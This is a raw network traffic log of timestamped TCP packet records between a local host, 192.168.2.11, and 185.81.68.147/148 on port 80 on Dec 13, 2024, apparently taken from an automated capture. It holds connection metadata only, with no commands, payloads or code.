                                                                                                                                                                                                Dec 13, 2024 08:20:08.661642075 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.661690950 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.662488937 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.662539005 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.662570953 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.662611008 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.663485050 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.663530111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.663582087 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.663633108 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.664536953 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.664580107 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.664618969 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.664665937 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.665430069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.665502071 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.665587902 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.666414976 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.666459084 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.666490078 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.666527033 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.667352915 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.667399883 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674081087 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674134970 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674150944 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674186945 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674309969 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674351931 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674359083 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.674396992 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.675265074 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.675322056 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.675400972 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.675441027 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.676234961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.676284075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.676358938 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.676400900 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.677241087 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.677288055 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.677375078 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.677417040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.678234100 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.678273916 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.678337097 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.678380966 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.679167032 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.679215908 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.679276943 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.679330111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.680088997 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.680135012 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.820923090 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.820951939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.821008921 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.821039915 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.821228027 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.821273088 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.821338892 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.821379900 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.822217941 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.822268963 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.822360039 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.822396040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.823168993 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.823219061 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.823270082 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.823311090 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.824238062 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.824286938 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.824347019 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.824397087 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.825164080 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.825223923 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.825272083 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.825319052 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.826124907 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.826174021 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.826214075 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.826257944 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.827101946 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.827152014 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.827210903 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.827405930 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.828100920 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.828128099 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.828147888 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.828174114 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.828939915 CET4993780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:08.829057932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.829097986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.829147100 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.829190016 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.829294920 CET4994680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:08.830087900 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.830106020 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.830138922 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.830152988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.831083059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.831110954 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.831124067 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.831150055 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.832043886 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.832084894 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.832109928 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.832149029 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.833003998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.833045959 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.833117008 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.833161116 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.834031105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.834088087 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.834115028 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.834161043 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.834979057 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.835079908 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.835104942 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.835149050 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.835952997 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.835999966 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.836061001 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.836102009 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.836987972 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.837032080 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.837079048 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.837121010 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.837934971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.837985992 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.838048935 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.838093042 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.838979959 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839040041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839076042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839116096 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839873075 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839915037 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839941978 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.839982033 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.840854883 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.840908051 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.840931892 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.840965033 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843236923 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843269110 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843281031 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843288898 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843302965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843332052 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843373060 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.843413115 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.844351053 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.844404936 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.844448090 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.844492912 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.844995022 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845043898 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845251083 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845293045 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845767975 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845813036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845880985 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.845922947 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.846704960 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.846755981 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.846813917 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.846858025 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.847714901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.847765923 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.847796917 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.847837925 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.848679066 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.848732948 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.848798037 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.848839998 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.849663973 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.849733114 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.849785089 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.849829912 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.850687027 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.850729942 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.850799084 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.850838900 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.851629972 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.851677895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.851713896 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.851758003 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.852591038 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.852648973 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.852720976 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.852761030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.853569031 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.853617907 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.853652954 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.853837967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.854568005 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.854623079 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.854655027 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.854691982 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.855588913 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.855614901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.855638981 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.855659008 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.856543064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.856594086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.856627941 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.856669903 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.857531071 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.857573032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.857620955 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.857678890 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.858483076 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.858540058 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.858588934 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.858634949 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.859549046 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.859601021 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.859618902 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.859754086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.860500097 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.860549927 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.860563993 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.860604048 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.861459970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.861529112 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.861562967 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.861624956 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.862411022 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.862456083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.862495899 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.862593889 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.862988949 CET4993980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.863337994 CET4994780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.863392115 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.863439083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.863523006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.863569021 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.864356041 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.864440918 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.864483118 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.864572048 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.865344048 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.865392923 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881282091 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881330013 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881376028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881406069 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881557941 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881602049 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881675005 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.881716013 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.882574081 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.882630110 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.882674932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.882718086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.883557081 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.883604050 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.883663893 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.883706093 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.884543896 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.884591103 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.884594917 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.884637117 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.885520935 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.885585070 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.885668039 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.885710001 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.886518002 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.886567116 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.886603117 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.886658907 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.942172050 CET8049943185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.942373037 CET8049943185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.942679882 CET4994380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.943970919 CET4994380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.949002028 CET8049946185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.949083090 CET4994680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:08.949115992 CET8049937185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.949168921 CET4993780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:08.967019081 CET4994680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:08.983107090 CET8049939185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.983186007 CET8049947185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.983216047 CET4993980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.983299971 CET4994780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.006803036 CET4994780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.012837887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.012913942 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.012922049 CET4993880192.168.2.11185.81.68.147
